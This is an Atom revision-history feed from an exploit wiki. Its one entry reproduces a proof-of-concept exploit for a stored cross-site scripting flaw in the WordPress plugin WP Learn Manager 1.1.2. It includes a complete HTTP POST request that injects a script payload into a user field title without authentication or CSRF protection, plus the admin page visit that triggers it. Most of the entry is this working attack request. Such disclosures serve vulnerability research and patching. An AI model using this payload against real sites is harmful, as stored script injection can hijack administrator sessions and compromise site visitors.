<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=WordPress_Plugin_WP_Learn_Manager_1.1.2_XSS%E6%BC%8F%E6%B4%9E</id>
	<title>WordPress Plugin WP Learn Manager 1.1.2 XSS漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=WordPress_Plugin_WP_Learn_Manager_1.1.2_XSS%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=WordPress_Plugin_WP_Learn_Manager_1.1.2_XSS%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-14T14:51:38Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=WordPress_Plugin_WP_Learn_Manager_1.1.2_XSS%E6%BC%8F%E6%B4%9E&amp;diff=6414&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS) # Date: July 2, 2021 # Exploit Author: Mohammed Adam  # Vendor Homepage: htt...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=WordPress_Plugin_WP_Learn_Manager_1.1.2_XSS%E6%BC%8F%E6%B4%9E&amp;diff=6414&amp;oldid=prev"/>
		<updated>2021-07-06T00:50:29Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS) # Date: July 2, 2021 # Exploit Author: Mohammed Adam  # Vendor Homepage: htt...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS)&lt;br /&gt;
# Date: July 2, 2021&lt;br /&gt;
# Exploit Author: Mohammed Adam &lt;br /&gt;
# Vendor Homepage: https://wplearnmanager.com/&lt;br /&gt;
# Software Link: https://wordpress.org/plugins/learn-manager/&lt;br /&gt;
# Version: 1.1.2&lt;br /&gt;
# References link: https://wpscan.com/vulnerability/e0182508-23f4-4bdb-a1ef-1d1be38f3ad1&lt;br /&gt;
&lt;br /&gt;
*Description:*&lt;br /&gt;
&lt;br /&gt;
The plugin does not properly sanitise or validate its User Field Titles, allowing XSS payload to be used in them. Furthermore, no CSRF and capability checks were in place, allowing such attack to be performed either via CSRF or as any user (including unauthenticated)&lt;br /&gt;
&lt;br /&gt;
*Proof of Concept:*&lt;br /&gt;
&lt;br /&gt;
POST /wp-admin/admin.php?page=jslm_fieldordering&amp;amp;task=saveuserfield HTTP/1.1&lt;br /&gt;
Accept:&lt;br /&gt;
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&lt;br /&gt;
Accept-Language: en-GB,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Content-Length: 207&lt;br /&gt;
Connection: close&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
fieldtitle=Image%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&amp;amp;published=1&amp;amp;isvisitorpublished=1&amp;amp;required=0&amp;amp;search_user=1&amp;amp;search_visitor=1&amp;amp;form_request=jslearnmanager&amp;amp;id=28&amp;amp;isuserfield=0&amp;amp;fieldfor=3&amp;amp;save=Save&lt;br /&gt;
&lt;br /&gt;
Then visit /wp-admin/admin.php?page=jslm_fieldordering&amp;amp;ff=3 as admin to trigger the XSS. It may also be triggered elsewhere&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>